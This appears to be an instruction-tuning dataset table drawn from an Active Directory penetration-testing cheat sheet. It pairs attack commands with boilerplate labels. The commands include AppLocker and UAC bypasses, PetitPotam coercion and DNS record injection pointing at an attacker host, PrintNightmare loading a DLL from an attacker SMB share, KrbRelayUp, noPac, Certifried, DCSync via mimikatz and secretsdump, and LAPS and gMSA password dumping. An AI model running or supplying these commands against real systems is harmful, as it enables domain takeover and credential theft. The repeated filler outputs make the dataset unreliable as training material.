instruction
stringclasses
270 values
input
stringlengths
3
214
output
stringclasses
297 values
Bypass Applocker
Get-Applocker infos
Note or procedural step under 'Bypass Applocker'.
Bypass Applocker
Get-ChildItem -Path HKLM:\SOFTWARE\Policies \Microsoft\Windows\SrpV2\Exe (dll/msi/...)
Note or procedural step under 'Bypass Applocker'.
Bypass Applocker
files in writables paths
Note or procedural step under 'Bypass Applocker'.
Bypass Applocker
C:\Windows\Temp
Note or procedural step under 'Bypass Applocker'.
Bypass Applocker
C:\Windows\Tasks
Note or procedural step under 'Bypass Applocker'.
Bypass Applocker
installutil.exe /logfile= /LogToConsole=false /U C:\runme.exe
Note or procedural step under 'Bypass Applocker'.
Bypass Applocker
mshta.exe my.hta
Note or procedural step under 'Bypass Applocker'.
Bypass Applocker
MsBuild.exe pshell.xml
Note or procedural step under 'Bypass Applocker'.
UAC bypass
Fodhelper.exe
Note or procedural step under 'UAC bypass'.
UAC bypass
wsreset.exe
Note or procedural step under 'UAC bypass'.
UAC bypass
msdt.exe
Note or procedural step under 'UAC bypass'.
Auto Enum
winPEASany_ofs.exe
Note or procedural step under 'Auto Enum'.
Auto Enum
.\PrivescCheck.ps1; Invoke-PrivescCheck -Extended"
Note or procedural step under 'Auto Enum'.
Search files
findstr /si 'pass' *.txt *.xml *.docx *.ini
Note or procedural step under 'Search files'.
Exploit
SMBGhost CVE-2020-0796
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.
Exploit
CVE-2021-36934 (HiveNightmare/SeriousSAM)
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.
Exploit
vssadmin list shadows
Note or procedural step under 'Exploit'.
Webdav
open file <file>.searchConnector-ms
Note or procedural step under 'Webdav'.
Webdav
dnstool.py -u <domain>\<user> -p <pass> --record 'attacker' --action add --data <ip_attacker> <dc_ip>
Note or procedural step under 'Webdav'.
Webdav
petitpotam.py -u '<user>' -p <pass> -d '<domain>' "attacker@80/random.txt" <ip>
Note or procedural step under 'Webdav'.
Kerberos Relay
KrbRelayUp.exe relay -Domain <domain> -CreateNewComputerAccount -ComputerName <computer$> -ComputerPassword <password>
Note or procedural step under 'Kerberos Relay'.
Kerberos Relay
KrbRelayUp.exe spawn -m rbcd -d <domain> -dc <dc> -cn <computer_name>-cp <omputer_pass>
Note or procedural step under 'Kerberos Relay'.
From Service account (SEImpersonate)
RoguePatato
Note or procedural step under 'From Service account (SEImpersonate)'.
From Service account (SEImpersonate)
GodPotato
Note or procedural step under 'From Service account (SEImpersonate)'.
From Service account (SEImpersonate)
PrintSpoofer
Note or procedural step under 'From Service account (SEImpersonate)'.
From Service account (SEImpersonate)
RemotePotato0
Note or procedural step under 'From Service account (SEImpersonate)'.
MS14-068
findSMB2UPTime.py <ip>
Note or procedural step under 'MS14-068'.
MS14-068
ms14-068.py -u <user>@<domain> -p <password> -s <user_sid> -d <dc_fqdn>
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.
MS14-068
msf> use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
Tool or command referenced under 'MS14-068'.
MS14-068
goldenPac.py -dc-ip <dc_ip> <domain>/<user>:<password>@target
Note or procedural step under 'MS14-068'.
GPP MS14-025
msf> use auxiliary/scanner/smb/smb_enum_gpp
Tool or command referenced under 'GPP MS14-025'.
GPP MS14-025
findstr /S /I cpassword \\<domain_fqdn>\sysvol\<domain_fqdn>\policies\*.xml
Note or procedural step under 'GPP MS14-025'.
GPP MS14-025
Get-GPPPassword.py <domain>/<user>:<password>@<dc_fqdn>
Note or procedural step under 'GPP MS14-025'.
PrivExchange (CVE-2019-0724, CVE-2019-0686)
privexchange.py -ah <attacker_ip> <exchange_host> -u <user> -d <domain> -p <password>
Note or procedural step under 'PrivExchange (CVE-2019-0724, CVE-2019-0686)'.
noPac (CVE-2021-42287, CVE-2021-42278)
nxc smb <ip> -u 'user' -p 'pass' -M nopac #scan
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
noPac (CVE-2021-42287, CVE-2021-42278)
noPac.exe -domain <domain> -user <user> -pass <password> /dc <dc_fqdn> /mAccount <machine_account> /mPassword <machine_password> /service cifs /ptt
Note or procedural step under 'noPac (CVE-2021-42287, CVE-2021-42278)'.
PrintNightmare (CVE-2021-1675, CVE-2021-34527)
nxc smb <ip> -u 'user' -p 'pass' -M printnightmare #scan
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
PrintNightmare (CVE-2021-1675, CVE-2021-34527)
printnightmare.py -dll '\\<attacker_ip>\smb\add_user.dll' '<user>:<password>@<ip>
Note or procedural step under 'PrintNightmare (CVE-2021-1675, CVE-2021-34527)'.
Certifried (CVE-2022-26923)
Create account
Note or procedural step under 'Certifried (CVE-2022-26923)'.
Certifried (CVE-2022-26923)
certipy account create -u <user>@<domain> -p '<password>' -user 'certifriedpc' -pass 'certifriedpass' -dns '<fqdn_dc>'
Note or procedural step under 'Certifried (CVE-2022-26923)'.
Certifried (CVE-2022-26923)
Request
Note or procedural step under 'Certifried (CVE-2022-26923)'.
Certifried (CVE-2022-26923)
certipy req -u 'certifriedpc$'@<domain> -p 'certifriedpass' -target <ca_fqdn> -ca <ca_name> -template Machine
Note or procedural step under 'Certifried (CVE-2022-26923)'.
Certifried (CVE-2022-26923)
Authentication
Note or procedural step under 'Certifried (CVE-2022-26923)'.
Certifried (CVE-2022-26923)
certipy auth -pfx <pfx_file> -username '<dc>$' -domain <domain> -dc-ip <dc_ip>
Note or procedural step under 'Certifried (CVE-2022-26923)'.
ProxyNotShell (CVE-2022-41040, CVE-2022-41082)
poc_aug3.py <host> <username> <password> <command>
Note or procedural step under 'ProxyNotShell (CVE-2022-41040, CVE-2022-41082)'.
ProxyNotShell (CVE-2022-41040, CVE-2022-41082)
ACLs/ACEs permissions
Note or procedural step under 'ProxyNotShell (CVE-2022-41040, CVE-2022-41082)'.
Dcsync
Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts
Note or procedural step under 'Dcsync'.
Dcsync
mimikatz lsadump::dcsync /domain:<target_domain> /user:<target_domain>\administrator
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Dcsync
secretsdump.py '<domain>'/'<user>':'<password>'@'<domain_controller>'
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Can change msDS-KeyCredentialLInk (Generic Write) + ADCS
Shadow Credentials
Note or procedural step under 'Can change msDS-KeyCredentialLInk (Generic Write) + ADCS'.
Can change msDS-KeyCredentialLInk (Generic Write) + ADCS
certipy shadow auto '-u <user>@<domain>' -p <password> -account '<target_account>'
Note or procedural step under 'Can change msDS-KeyCredentialLInk (Generic Write) + ADCS'.
Can change msDS-KeyCredentialLInk (Generic Write) + ADCS
pywhisker.py -d "FQDN_DOMAIN" -u "user1" -p "CERTIFICATE_PASSWORD" --target "TARGET_SAMNAME" --action "list"
Note or procedural step under 'Can change msDS-KeyCredentialLInk (Generic Write) + ADCS'.
On Group
GenericAll/GenericWrite/Self/Add Extended Rights
Note or procedural step under 'On Group'.
On Group
Add member to the group
Note or procedural step under 'On Group'.
On Group
Write Owner
Note or procedural step under 'On Group'.
On Group
Grant Ownership
Note or procedural step under 'On Group'.
On Group
WriteDACL + WriteOwner
Note or procedural step under 'On Group'.
On Group
Grant rights
Note or procedural step under 'On Group'.
On Group
Give yourself generic all
Note or procedural step under 'On Group'.
On Computer
GenericAll / GenericWrite
Note or procedural step under 'On Computer'.
On Computer
msDs-AllowedToActOnBehalf
Note or procedural step under 'On Computer'.
On Computer
add Key Credentials
Note or procedural step under 'On Computer'.
On User
GenericAll / GenericWrite
Note or procedural step under 'On User'.
On User
Change password
Note or procedural step under 'On User'.
On User
add SPN (target kerberoasting)
Note or procedural step under 'On User'.
On User
add key credentials
Note or procedural step under 'On User'.
On User
login script
Note or procedural step under 'On User'.
On User
ForceChangePassword
Note or procedural step under 'On User'.
On User
net user <user> <password> /domain
Note or procedural step under 'On User'.
On OU
Write Dacl
Note or procedural step under 'On OU'.
On OU
ACE Inheritance
Note or procedural step under 'On OU'.
On OU
Grant rights
Note or procedural step under 'On OU'.
On OU
GenericAll / GenericWrite / Manage Group Policy Links
Note or procedural step under 'On OU'.
On OU
OUned.py --config config.ini
Note or procedural step under 'On OU'.
ReadGMSAPassword
gMSADumper.py -u '<user>' -p '<password>' -d '<domain>'
Note or procedural step under 'ReadGMSAPassword'.
ReadGMSAPassword
nxc ldap <ip> -u <user> -p <pass> --gmsa
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
ReadGMSAPassword
ldeep ldap -u <user> -p <password> -d <domain> -s ldaps://<dc_ip> gmsa
Note or procedural step under 'ReadGMSAPassword'.
Get LAPS passwords
Who can read LAPS
Note or procedural step under 'Get LAPS passwords'.
Get LAPS passwords
MATCH p=(g:Base)-[:ReadLAPSPassword]->(c:Computer) RETURN p
Note or procedural step under 'Get LAPS passwords'.
Get LAPS passwords
Read LAPS
Note or procedural step under 'Get LAPS passwords'.
Get LAPS passwords
Get-LapsADPassword -DomainController <ip_dc> -Credential <domain>\<login> | Format-Table -AutoSize
Note or procedural step under 'Get LAPS passwords'.
Get LAPS passwords
ldeep ldap -u <user> -p <password> -d <domain> -s ldap://<dc_ip> laps
Note or procedural step under 'Get LAPS passwords'.
Get LAPS passwords
foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}
Note or procedural step under 'Get LAPS passwords'.
Get LAPS passwords
nxc ldap <dc_ip> -d <domain> -u <user> -p <password> --module laps
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Get LAPS passwords
msf> use post/windows/gather/credentials/enum_laps
Tool or command referenced under 'Get LAPS passwords'.
GPO
Who can control GPOs
Note or procedural step under 'GPO'.
GPO
MATCH p=((n:Base)-[]->(gp:GPO)) RETURN p
Note or procedural step under 'GPO'.
GPO
SID of principals that can create new GPOs in the domain
Note or procedural step under 'GPO'.
GPO
Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=blah,DC=com" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" } | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl
Note or procedural step under 'GPO'.
GPO
Return the principals that can write to the GP-Link attribute on OUs
Note or procedural step under 'GPO'.
GPO
Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN, SecurityIdentifier | fl
Note or procedural step under 'GPO'.
GPO
Generic Write on GPO
Note or procedural step under 'GPO'.
GPO
Abuse GPO
Note or procedural step under 'GPO'.
DNS Admin
DNSadmins abuse (CVE-2021-40469)
Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance.
DNS Admin
dnscmd.exe /config /serverlevelplugindll <\\path\to\dll> # need a dnsadmin user
Note or procedural step under 'DNS Admin'.
DNS Admin
sc \\DNSServer stop dns sc \\DNSServer start dns
Note or procedural step under 'DNS Admin'.
Find delegation
findDelegation.py "<domain>"/"<user>":"<password>"
Note or procedural step under 'Find delegation'.
Find delegation
With BloodHound
Note or procedural step under 'Find delegation'.
Find delegation
Unconstrained
Note or procedural step under 'Find delegation'.
Find delegation
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
Note or procedural step under 'Find delegation'.